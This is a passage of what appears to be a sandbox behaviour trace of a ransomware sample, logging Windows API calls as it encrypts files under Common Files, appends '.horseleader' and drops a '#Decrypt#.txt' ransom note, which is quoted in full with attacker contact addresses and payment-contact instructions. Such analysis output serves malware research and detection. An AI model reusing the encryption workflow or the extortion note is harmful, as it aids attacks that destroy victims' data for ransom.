lpNumberOfBytesWritten=0x32aeb7c*=0x1bf3, lpOverlapped=0x0) returned 1 [0247.382] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.382] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.382] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.382] CloseHandle (hObject=0x1a4) returned 1 [0247.382] GetProcessHeap () returned 0x780000 [0247.382] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.382] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.horseleader") returned 90 [0247.382] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png.horseleader")) returned 1 [0247.383] GetProcessHeap () returned 0x780000 [0247.383] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.383] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xbbf3, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.383] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.383] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\#Decrypt#.txt") returned 79 [0247.383] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.384] lstrlenA (lpString="All your files have been 
ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0247.384] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.385] lstrlenA (lpString="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") returned 1368 [0247.385] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.385] CloseHandle (hObject=0x158) returned 1 [0247.385] GetProcessHeap () returned 0x780000 [0247.385] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0247.385] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59544a90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="NETWORK", cAlternateFileName="")) returned 1 [0247.385] lstrcmpiW (lpString1="NETWORK", lpString2="Windows") returned -1 [0247.385] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK") returned 67 [0247.385] lstrcmpW (lpString1="NETWORK", lpString2=".") returned 1 [0247.385] lstrcmpW (lpString1="NETWORK", lpString2="..") returned 1 [0247.385] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.385] GetProcessHeap () returned 0x780000 [0247.385] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.385] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\*") returned 69 [0247.385] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59544a90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.386] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.386] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\.") returned 69 [0247.386] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.386] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59544a90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.386] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.386] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\..") returned 70 [0247.386] lstrcmpW (lpString1="..", lpString2=".") returned 1 
[0247.386] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.386] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x107bd500, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x59544a90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x107bd500, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xc649, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="NETWORK.ELM", cAlternateFileName="")) returned 1 [0247.386] lstrcmpiW (lpString1="NETWORK.ELM", lpString2="Windows") returned -1 [0247.386] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM") returned 79 [0247.386] StrStrIW (lpFirst="NETWORK.ELM", lpSrch=".horseleader") returned 0x0 [0247.386] lstrcmpW (lpString1="NETWORK.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.386] lstrcmpW (lpString1="NETWORK.ELM", lpString2="_uninstalling_.png") returned 1 [0247.386] lstrlenW (lpString=".testttjffg") returned 11 [0247.386] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM", lpSrch=".testttjffg") returned 0x0 [0247.386] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.386] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.386] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.387] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM") returned 79 [0247.387] StrStrW (lpFirst="NETWORK.ELM", lpSrch=".txt") returned 0x0 [0247.387] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=50761) returned 1 [0247.387] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.389] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.389] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.389] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.390] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.390] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.390] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2649, lpOverlapped=0x0) returned 1 [0247.390] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd9b7, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.390] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2649, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2649, lpOverlapped=0x0) returned 1 [0247.390] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.391] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.391] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.391] CloseHandle (hObject=0x1a4) returned 1 [0247.391] GetProcessHeap () returned 0x780000 [0247.391] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.391] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM.horseleader") returned 91 [0247.391] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.elm.horseleader")) returned 1 [0247.392] GetProcessHeap () returned 0x780000 [0247.392] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.392] FindNextFileW (in: hFindFile=0x7c6760, 
lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6a3bce50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x249, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="NETWORK.INF", cAlternateFileName="")) returned 1 [0247.392] lstrcmpiW (lpString1="NETWORK.INF", lpString2="Windows") returned -1 [0247.392] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF") returned 79 [0247.392] StrStrIW (lpFirst="NETWORK.INF", lpSrch=".horseleader") returned 0x0 [0247.392] lstrcmpW (lpString1="NETWORK.INF", lpString2="#Decrypt#.txt") returned 1 [0247.392] lstrcmpW (lpString1="NETWORK.INF", lpString2="_uninstalling_.png") returned 1 [0247.392] lstrlenW (lpString=".testttjffg") returned 11 [0247.392] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF", lpSrch=".testttjffg") returned 0x0 [0247.392] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.392] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.392] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.394] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF") returned 79 [0247.394] StrStrW (lpFirst="NETWORK.INF", lpSrch=".txt") returned 0x0 [0247.394] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=585) returned 1 [0247.394] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x249, lpOverlapped=0x0) returned 1 [0247.410] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.411] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x249, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x249, lpOverlapped=0x0) returned 1 [0247.411] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.411] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.411] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.411] CloseHandle (hObject=0x1a4) returned 1 [0247.412] GetProcessHeap () returned 0x780000 [0247.412] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.412] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF.horseleader") returned 91 [0247.412] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\NETWORK\\NETWORK.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.inf.horseleader")) returned 1 [0247.416] GetProcessHeap () returned 0x780000 [0247.416] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.416] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x554, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.416] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.416] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 79 [0247.416] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.416] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.416] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.416] lstrlenW (lpString=".testttjffg") returned 11 [0247.416] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.416] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.417] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.417] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.417] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 79 [0247.417] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.417] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1364) returned 1 [0247.418] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x554, lpOverlapped=0x0) returned 1 [0247.425] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffaac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.425] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x554, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x554, lpOverlapped=0x0) returned 1 [0247.425] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.425] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.425] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: 
lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.425] CloseHandle (hObject=0x1a4) returned 1 [0247.425] GetProcessHeap () returned 0x780000 [0247.425] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.426] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.horseleader") returned 91 [0247.426] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif.horseleader")) returned 1 [0247.428] GetProcessHeap () returned 0x780000 [0247.428] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.428] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x2d35, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.428] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.429] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 80 [0247.429] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 
[0247.429] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.429] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.429] lstrlenW (lpString=".testttjffg") returned 11 [0247.429] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.429] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.429] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.429] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 